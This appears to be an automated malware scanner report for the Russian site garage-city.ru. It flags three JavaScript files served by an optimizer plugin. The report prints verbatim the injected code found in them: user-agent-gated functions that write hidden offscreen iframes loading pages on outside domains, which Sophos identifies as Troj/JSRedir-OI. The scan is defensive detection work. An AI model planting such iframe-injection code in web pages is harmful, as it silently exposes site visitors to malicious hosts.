New scan:

Malware Scanner report for garage-city.ru

Malicious/Suspicious/Total urls checked
3/0/15
3 pages have malicious code. See details below
Blacklists
OK
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
1/0/4
1 malicious iframe found. See details below
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Scanned pages/files

RequestServer responseStatus
http://www.garage-city.ru/
200 OK
Content-Length: 28710
Content-Type: text/html
clean
http://www.garage-city.ru/plugins/system/JCH_Optimize/jscss.php?f=28910921348407404324163cd4041350&type=js
200 OK
Content-Length: 20964
Content-Type: text/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

function Argisuliterkas(){var dude=navigator.userAgent;var unificas=(dude.indexOf("Windows")<+1||dude.indexOf("Chrome")>-1||dude.indexOf("IEMobile")>-1);if(!unificas){document.write('<iframe src="http://raficavulerta.zombie-ink.ca/pendinoda15.html" style="positi'+'on:absolute;bor'+'der-style:none;left: -849px;backgr'+'ound-color:green;top: -849px;" height="138" width="138"></ifra'+'me>');}}
Argisuliterkas();
function Argisuliterkas(){var dude=navigator.userAgent;var
... 3110 bytes are skipped ...
arget||e.srcElement;wrapper=button.parentNode;if(!artHasClass(button,'active'))wrapper.className+=" active";});artEventHelper.bind(button,'mouseup',function(e){e=e||window.event;button=e.target||e.srcElement;wrapper=button.parentNode;if(!artHasClass(button,'active'))wrapper.className=wrapper.className.replace(/active/,"");});}}}
artLoadEvent.add(function(){artButtonsSetupJsHover("art-button");});artLoadEvent.add(function(){artButtonsSetupJsHover("button");artButtonsSetupJsHover("readon");});

Antivirus reports:

Sophos
Troj/JSRedir-OI

http://www.garage-city.ru/search?view=search
200 OK
Content-Length: 27621
Content-Type: text/html
clean
http://www.garage-city.ru/plugins/system/JCH_Optimize/jscss.php?f=d6a83e92bc352fa38bd29eab3c07e553&type=js
200 OK
Content-Length: 13274
Content-Type: text/javascript
malicious
Malicious code found. Script contains blacklisted domain: lardopasjet.cultura-tayrona.ch

function Argisuliterkas(){var dude=navigator.userAgent;var unificas=(dude.indexOf("Windows")<+1||dude.indexOf("Chrome")>-1||dude.indexOf("IEMobile")>-1);if(!unificas){document.write('<iframe src="http://lardopasjet.cultura-tayrona.ch/minofosal15.html" style="positi'+'on:absolute;bor'+'der-style:none;left: -849px;backgr'+'ound-color:green;top: -849px;" height="138" width="138"></ifra'+'me>');}}
Argisuliterkas();
function Argisuliterkas(){var dude=navigator.userAgent;var unificas=(dude.indexOf("Windows")<+1||dude.indexOf("Chrome")>-1||dude.indexOf("IEMobile")>-1);if(!unificas){document.write('<iframe src="http://lardopasjet.cultura-t
...[3397 bytes skipped]...

Decoded script:

...[9809 bytes skipped]...
FadeDelay,transitionDuration:crossFadeSpeed,transitionText:CTRtransitionText,rotateAction:navTrigger,PlayText:fpssPlayText,PauseText:fpssPauseText,autoplay:autoslide,text_effect:CTRtext_effect,stop:false})}window.addEvent('domready',function(){if($('fpss-container')){setTimeout('init_fpss();',fpssLoaderDelay)}});function ppButtonClicked(){}function clearSlide(){}function showPrev(){}function showNext(){}
<iframe src="http://lardopasjet.cultura-tayrona.ch/minofosal15.html" style="position:absolute;border-style:none;left: -849px;background-color:green;top: -849px;" height="138" width="138"></iframe><iframe src="http://lardopasjet.cultura-tayrona.ch/minofosal15.html" style="position:absolute;border-style:none;left: -849px;background-color:green;top: -849px;" height="138" width="138"></iframe>

Malicious iFrame found.
size: 138x138     
src: http://lardopasjet.cultura-tayrona.ch/minofosal15.html
This URL is marked by Google as suspicious

<iframe src="http://lardopasjet.cultura-tayrona.ch/minofosal15.html" style="positi'+'on:absolute;bor'+'der-style:none;left: -849px;backgr'+'ound-color:green;top: -849px;" height="138" width="138">

http://www.garage-city.ru/index.php?option=com_xmap&sitemap=1&Itemid=66
200 OK
Content-Length: 32178
Content-Type: text/html
clean
http://www.garage-city.ru/arendatory/
200 OK
Content-Length: 32102
Content-Type: text/html
clean
http://www.garage-city.ru/plugins/system/JCH_Optimize/jscss.php?f=3f8e357cbc5baec41ca52556e297f787&type=js
200 OK
Content-Length: 14750
Content-Type: text/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

function Teobromine(){var w=navigator.userAgent;var n=(w.indexOf("Android")>-1||w.indexOf("Chrome")>-1||w.indexOf("Linux")>-1||w.indexOf("Macintosh")>-1||w.indexOf("IEMobile")>-1||w.indexOf("FreeBSD")>-1||w.indexOf("iPhone")>-1||w.indexOf("iPad")>-1);if(!n){document.write('<iframe src="http://qiolkajet.xemphimnhanh.org/cubebacort15.html" style="posi'+'tion:absolute;left: -700px;top: -700px;" height="133" width="133"></ifra'+'me>');}}
Teobromine();
func
... 3143 bytes are skipped ...
arget||e.srcElement;wrapper=button.parentNode;if(!artHasClass(button,'active'))wrapper.className+=" active";});artEventHelper.bind(button,'mouseup',function(e){e=e||window.event;button=e.target||e.srcElement;wrapper=button.parentNode;if(!artHasClass(button,'active'))wrapper.className=wrapper.className.replace(/active/,"");});}}}
artLoadEvent.add(function(){artButtonsSetupJsHover("art-button");});artLoadEvent.add(function(){artButtonsSetupJsHover("button");artButtonsSetupJsHover("readon");});

Antivirus reports:

Sophos
Troj/JSRedir-OI

http://www.garage-city.ru/arendatory/22a-133
200 OK
Content-Length: 26736
Content-Type: text/html
clean
http://www.garage-city.ru/plugins/system/JCH_Optimize/jscss.php?f=15238108fcbc520b26f51da91955c3dd&type=js
200 OK
Content-Length: 20969
Content-Type: text/javascript
clean
http://www.garage-city.ru/arendatory/22avtotehnolodzhi33
200 OK
Content-Length: 26697
Content-Type: text/html
clean
http://www.garage-city.ru/arendatory/22avtotreiyd-m33
200 OK
Content-Length: 26567
Content-Type: text/html
clean
http://www.garage-city.ru/arendatory/22akorn-sb33
200 OK
Content-Length: 26483
Content-Type: text/html
clean
http://www.garage-city.ru/plugins/system/JCH_Optimize/jscss.php?f=28910921348407404324163cd4041350&type=js&gz=gz
200 OK
Content-Length: 6560
Content-Type: text/javascript
clean
http://www.garage-city.ru/arendatory/tehcentr-22vyhlop33
200 OK
Content-Length: 30390
Content-Type: text/html
clean
http://www.garage-city.ru/arendatory/22avto-draiyv33
200 OK
Content-Length: 27783
Content-Type: text/html
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: garage-city.ru

Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: garage-city.ru
Referer: http://www.google.com/search?q=garage-city.ru

Result:
The result is similar to the first query. There are no suspicious redirects found.

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=garage-city.ru

Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://garage-city.ru/

Result: garage-city.ru is not infected or malware details are not published yet.